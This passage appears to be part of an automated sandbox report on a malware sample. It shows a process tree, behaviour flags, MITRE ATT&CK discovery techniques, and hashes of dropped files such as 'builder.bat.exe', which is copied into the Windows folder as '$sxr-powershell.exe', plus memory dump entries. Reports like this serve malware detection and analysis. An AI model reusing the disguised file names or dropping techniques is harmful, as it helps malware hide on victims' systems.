($dqTMH)))
      4⤵
      PID:5752

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4640
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4668
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4668.0.974862057\257081792" -parentBuildID 20221007134813 -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 20890 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d2350a72-8654-4849-a197-d21ae9c7e3ce} 4668 "\\.\pipe\gecko-crash-server-pipe.4668" 1924 1ca1f116558 gpu
    3⤵
    PID:1464
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4668.1.817235360\42282518" -parentBuildID 20221007134813 -prefsHandle 2308 -prefMapHandle 2304 -prefsLen 20926 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd35a75b-47d3-492d-aea9-4a6cefd7258a} 4668 "\\.\pipe\gecko-crash-server-pipe.4668" 2316 1ca11172e58 socket
    3⤵
    PID:3204
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4668.2.1026509932\654441315" -childID 1 -isForBrowser -prefsHandle 2908 -prefMapHandle 3264 -prefsLen 21074 -prefMapSize 232675 -jsInitHandle 1456 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f5b16f52-8fc9-4392-9999-8e9ec194ad84} 4668 "\\.\pipe\gecko-crash-server-pipe.4668" 2920 1ca1e091758 tab
    3⤵
    PID:4812
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4668.3.1324969771\898676009" -childID 2 -isForBrowser -prefsHandle 2460 -prefMapHandle 2348 -prefsLen 26519 -prefMapSize 232675 -jsInitHandle 1456 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {70669ea1-d8e4-4fe0-99dd-d94a522322ce} 4668 "\\.\pipe\gecko-crash-server-pipe.4668" 3460 1ca11163258 tab
    3⤵
    PID:2496
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4668.4.33454372\563671461" -childID 3 -isForBrowser -prefsHandle 3792 -prefMapHandle 3788 -prefsLen 26519 -prefMapSize 232675 -jsInitHandle 1456 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6e05cc2d-e39f-4f30-8e43-5dca0dd2f844} 4668 "\\.\pipe\gecko-crash-server-pipe.4668" 3804 1ca22db7258 tab
    3⤵
    PID:3676
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4668.6.1274145412\2026929781" -childID 5 -isForBrowser -prefsHandle 5124 -prefMapHandle 5128 -prefsLen 26578 -prefMapSize 232675 -jsInitHandle 1456 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c056c9ee-48d6-4abb-a944-669bbda306c3} 4668 "\\.\pipe\gecko-crash-server-pipe.4668" 5016 1ca249b7858 tab
    3⤵
    PID:1416
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4668.7.1602893587\1477592480" -childID 6 -isForBrowser -prefsHandle 5316 -prefMapHandle 5320 -prefsLen 26578 -prefMapSize 232675 -jsInitHandle 1456 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dd7e56b3-abf7-4f01-a00a-5d9c88472717} 4668 "\\.\pipe\gecko-crash-server-pipe.4668" 5396 1ca249b7b58 tab
    3⤵
    PID:3196
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4668.5.643683449\684546955" -childID 4 -isForBrowser -prefsHandle 4988 -prefMapHandle 4892 -prefsLen 26578 -prefMapSize 232675 -jsInitHandle 1456 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8491779b-2bc5-42f2-99d8-0ce2d76d32d3} 4668 "\\.\pipe\gecko-crash-server-pipe.4668" 4996 1ca249b7258 tab
    3⤵
    PID:4448
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4668.9.245930174\1776714345" -childID 8 -isForBrowser -prefsHandle 5820 -prefMapHandle 5824 -prefsLen 26755 -prefMapSize 232675 -jsInitHandle 1456 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e9577df7-0812-44de-b95e-36d47b7480b2} 4668 "\\.\pipe\gecko-crash-server-pipe.4668" 5812 1ca23e28258 tab
    3⤵
    PID:4228
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4668.8.2003481201\550666203" -childID 7 -isForBrowser -prefsHandle 4840 -prefMapHandle 4828 -prefsLen 26755 -prefMapSize 232675 -jsInitHandle 1456 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {beacb58a-e249-4ea3-966c-6ae82b917112} 4668 "\\.\pipe\gecko-crash-server-pipe.4668" 4800 1ca246bed58 tab
    3⤵
    PID:4596
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4668.10.1615331307\2055486265" -parentBuildID 20221007134813 -prefsHandle 5880 -prefMapHandle 5884 -prefsLen 26755 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {63e487d5-6cd9-4c4b-9c34-c2ec19227904} 4668 "\\.\pipe\gecko-crash-server-pipe.4668" 5872 1ca228b6858 rdd
    3⤵
    PID:2040
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4668.11.1520973837\1055399274" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 6296 -prefMapHandle 6292 -prefsLen 26755 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bc40e90f-42c8-4240-a106-137b13e76b30} 4668 "\\.\pipe\gecko-crash-server-pipe.4668" 6304 1ca228b7458 utility
    3⤵
    PID:5140
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4668.12.1628699794\766695900" -childID 9 -isForBrowser -prefsHandle 6596 -prefMapHandle 3324 -prefsLen 26755 -prefMapSize 232675 -jsInitHandle 1456 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {32a6138b-7e9c-4cc5-b3d3-fb719447b607} 4668 "\\.\pipe\gecko-crash-server-pipe.4668" 6592 1ca25fcc558 tab
    3⤵
    PID:5488
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4668.13.1289453537\757043450" -childID 10 -isForBrowser -prefsHandle 7020 -prefMapHandle 7016 -prefsLen 27195 -prefMapSize 232675 -jsInitHandle 1456 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8fd4ebb1-0f4c-4bef-b318-cc17a444458c} 4668 "\\.\pipe\gecko-crash-server-pipe.4668" 7032 1ca262fb358 tab
    3⤵
    PID:6032

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{c75bfb41-8af3-4ad3-b851-56262d40e654}
1⤵
PID:5428

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{e6891ef2-f95b-44a0-86ee-6f4c48b6d6e1}
1⤵
PID:5304

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{6a4d0d32-4089-49ca-85c8-4d5d1833c8b3}
1⤵
PID:6040

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x494 0x508
1⤵
PID:1300

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6exu9k4v.default-release\activity-stream.discovery_stream.json.tmp

Filesize
153KB

MD5
8c3747b6d44a75c17d5b4ce6800339a3

SHA1
db967c74f061690659b88f30b8e628bfb3d5e02c

SHA256
28968aac3a690d9f839716e25cca26f7eff9a0b7f9b2ee6356309772ee487ce4

SHA512
0095e0017d5f225e1493c726c4caf92dd35bb4adc87f4252dc6e80ab4578ab7f1dd0f573bb4663653ebfbf3c5d0f4849f611ad2be9b1b1439a021f4bb0ddda7f

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6exu9k4v.default-release\safebrowsing-updating\ads-track-digest256-1.vlpset

Filesize
54KB

MD5
4f9ef3d3a71d4cb49e623e3f4b7b1162

SHA1
c2d65973b44b051d043475e9387fa7100514acbd

SHA256
48ae004f3c542ac764dd5a1e894918ec4b250b5c1f7209256c191cae13106b1f

SHA512
f7017204ad37ceedbff4e8b58ab4edac75748d2f36693e59ea9d9157f637d29b53c6405d994ac9fc62712f2574013e95c4817ff49229c78dcc23cac805b13ed7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_peydhvd2.s1t.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\builder.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\builder.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6exu9k4v.default-release\prefs-1.js

Filesize
6KB

MD5
befc190c1fb628b45526239183a546cb

SHA1
98b2599b85c4a711dd493c03e17fba7dc31a8c8d

SHA256
d074424d2e98c961570668f3d54eb3e651a567ec4652a4ea493b19dd00c0a6a8

SHA512
f4e823c9e6a2576354bd83f869711ba4f44b86a3d71af109ec96b6d8ecd91c5ea34edb24e12da60361b4d10473d95d639bb6f17ca62430498d9bb545954daf99

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6exu9k4v.default-release\prefs-1.js

Filesize
6KB

MD5
1ce5affbbf74c6d07296c415deb91c68

SHA1
7fa0af686b34a24073c9264c931660c09c2f2033

SHA256
dfd5b2ce62d3c0277e7c2dc1a2f46b74b01a3e7789fbf4f29f4346825e1543c4

SHA512
a119616b1f3a132a7f7f78f123a8329c8c9e3c28135dc8ebd6bfb13257bd69b5479024816d3017a96402bbf89ec69ef5b2b9d9c08082a515cd68d6071343081e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6exu9k4v.default-release\prefs-1.js

Filesize
7KB

MD5
3059845d5d8dfd6ece12b154865154fb

SHA1
64065ffdb13505e1a9791738be1604cd07df0e86

SHA256
4ef397d3429e210056f186eae1ddbc7fa7940b2aabdf1dfc74146190507082f0

SHA512
1b96cbe91c22ae750183c82ff81cef277ac1b21d72fcd984d9f2d5a8124179197a0d10d0d072d1ea988199343634e865c5ec0f51134cdc7248da1978be1a98ba

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6exu9k4v.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
1KB

MD5
07f068f80115461e068f8a70a905f298

SHA1
626a09480ad175bdd7f0919a71265e6632b2afe2

SHA256
793d39d5e00368b57452cae036bc632a50a9f917e77642d2a3e0237dd8c33ff3

SHA512
dbba923400f99d8ac1f3b00ae6427df9dcbf43a0616ad93dd5f7db6af83babf5f2a2aebf4d39c478aad2bfa9a879e8fc84fe7a8900d24cb1a2957a639419c5fc

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6exu9k4v.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
1KB

MD5
3e28ab0775f9c61d4689d8495dd004a4

SHA1
5f7c2a9a09406095a66cd77651049f0298393746

SHA256
07a370d629395f24df28d17b238f864bdda5dea22ecea5ae05898a7c635ae411

SHA512
a4bfcc39e1c5f12f29a64f13ce3ced9da0d0cfeb9f08399b099f38747d9d327412dfa0bcffcab3b7ff0f0d1371ad5d300f950ffc972e2563ec982295e792fe49

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6exu9k4v.default-release\storage\default\https+++www.youtube.com\cache\morgue\147\{1a291920-d427-4915-a4f6-1e1a62721893}.final

Filesize
3KB

MD5
02e11e6fe18a1f4719fa5a229bf86627

SHA1
0100138e19f2a1429e911c237d3278f5e47bcec0

SHA256
600e57719bceccf69fc1b87d9ad397f573c3a6ed81aff1008b381f254ece83be

SHA512
0f4f177fce9106886e2938e208de7d8ecdc736cbaad32a28eea93ba6426e1458f6721ed58948016fd700ace64fafc195d67b9762f3c1e5b4eeae663de82b3ab9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6exu9k4v.default-release\storage\default\https+++www.youtube.com\idb\2157247134yCt7-%iCt7-%r1e3sbpco.sqlite

Filesize
48KB

MD5
56b3342d12f7f1bbcb0dc2df76bd3f6f

SHA1
5cd58af9528c7a5fd01e84c4838885dc8fbb8b4f

SHA256
7a9e4650ad53d6c568904223b4235d2e9a211703bec5d490c43dda0c11ff7dd5

SHA512
f1d583bc86e7a2a38a3d0165070a6cb2538ca9278014d0be8a6f6b577fe6506684eb3fd2c38554df794e1c20d9d49ea5049e027107836fc1c403034ff27ed664

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6exu9k4v.default-release\storage\default\https+++www.youtube.com\idb\3211250388sbwdpsunsohintoatciif.sqlite-wal

Filesize
40KB

MD5
8231041677eeb6fad899561caa08b18b

SHA1
f2c4757db7de62eb38ae03687f57de258a13a161

SHA256
7d6030ac81c04ae220b18f12ef29e5f34328f6552bc83ed76e1b221eac72404d

SHA512
4b137b8ddd0570f1ad5f1b3d35019e3cebe982d67b74489d0064ad23803d486ddacd5bebfe14fc24b6d8b700f1ec6a23cbd6fea0c6d4bea4dced7480d5fd0556

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows\System32\ucrtbased.dll

Filesize
1.8MB

MD5
7873612dddd9152d70d892427bc45ef0

SHA1
ab9079a43a784471ca31c4f0a34b698d99334dfa

SHA256
203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf

SHA512
d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083

Download Submit
C:\Windows\System32\vcruntime140_1d.dll

Filesize
52KB

MD5
9ef28981adcbf4360de5f11b8f4ecff9

SHA1
219aaa1a617b1dfa36f3928bd1020e410666134f

SHA256
8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a

SHA512
ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c

Download Submit
C:\Windows\System32\vcruntime140d.dll

Filesize
162KB

MD5
a366d6623c14c377c682d6b5451575e6

SHA1
a8894fcfb3aa06ad073b1f581b2e749b54827971

SHA256
7ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6

SHA512
cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11

Download Submit
memory/620-631-0x0000013076580000-0x00000130765A1000-memory.dmp

Filesize
132KB

Download
memory/620-634-0x00007FFE79BB0000-0x00007FFE79BC0000-memory.dmp

Filesize
64KB

Download
memory/620-632-0x00000130765B0000-0x00000130765D7000-memory.dmp

Filesize
156KB

Download
memory/684-636-0x0000022929710000-0x0000022929737000-memory.dmp

Filesize
156KB

Download
memory/4848-277-0x000002354EFD0000-0x000002354EFE0000-memory.dmp

Filesize
64KB

Download
memory/4848-285-0x00007FFEB8840000-0x00007FFEB88FE000-memory.dmp

Filesize
760KB

Download
memory/4848-275-0x000002354EFD0000-0x000002354EFE0000-memory.dmp

Filesize
64KB

Download
memory/4848-253-0x000002354F4F0000-0x000002354F512000-memory.dmp

Filesize
136KB

Download
memory/4848-262-0x000002354EFD0000-0x000002354EFE0000-memory.dmp

Filesize
64KB

Download
memory/4848-394-0x00007FFEB9B30000-0x00007FFEB9D25000-memory.dmp

Filesize
2.0MB

Download
memory/4848-263-0x000002354EFD0000-0x000002354EFE0000-memory.dmp

Filesize
64KB

Download
memory/4848-261-0x000002354EFD0000-0x000002354EFE0000-memory.dmp

Filesize
64KB

Download
memory/4848-284-0x00007FFEB9B30000-0x00007FFEB9D25000-memory.dmp

Filesize
2.0MB

Download
memory/4848-276-0x000002354EFD0000-0x000002354EFE0000-memory.dmp

Filesize
64KB

Download
memory/5428-398-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/5428-396-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/5752-553-0x0000029EE8130000-0x0000029EE8140000-memory.dmp

Filesize
64KB

Download
memory/5752-559-0x0000029EE8130000-0x0000029EE8140000-memory.dmp

Filesize
64KB

Download
memory/6040-627-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/6040-599-0x00007FFEB9B30000-0x00007FFEB9D25000-memory.dmp

Filesize
2.0MB

Download
memory/6040-614-0x00007FFEB8840000-0x00007FFEB88FE000-memory.dmp

Filesize
760KB

Download
memory/6040-584-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/6040-595-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/6068-503-0x00007FFEB8840000-0x00007FFEB88FE000-memory.dmp

Filesize
760KB

Download
memory/6068-576-0x00007FFEB8840000-0x00007FFEB88FE000-memory.dmp

Filesize
760KB

Download
memory/6068-575-0x00007FFEB9B30000-0x00007FFEB9D25000-memory.dmp

Filesize
2.0MB

Download
memory/6068-547-0x00000245F37B0000-0x00000245F3972000-memory.dmp

Filesize
1.8MB

Download
memory/6068-546-0x00000245F3000000-0x00000245F30B2000-memory.dmp

Filesize
712KB

Download
memory/6068-545-0x00000245F2EF0000-0x00000245F2F40000-memory.dmp

Filesize
320KB

Download
memory/6068-521-0x00007FFEB9B30000-0x00007FFEB9D25000-memory.dmp

Filesize
2.0MB

Download
memory/6068-504-0x00000245D91B0000-0x00000245D91C0000-memory.dmp

Filesize
64KB

Download
memory/6068-506-0x00000245D91B0000-0x00000245D91C0000-memory.dmp

Filesize
64KB

Download
memory/6068-505-0x00000245D91B0000-0x00000245D91C0000-memory.dmp

Filesize
64KB

Download
memory/6068-502-0x00007FFEB9B30000-0x00007FFEB9D25000-memory.dmp

Filesize
2.0MB

Download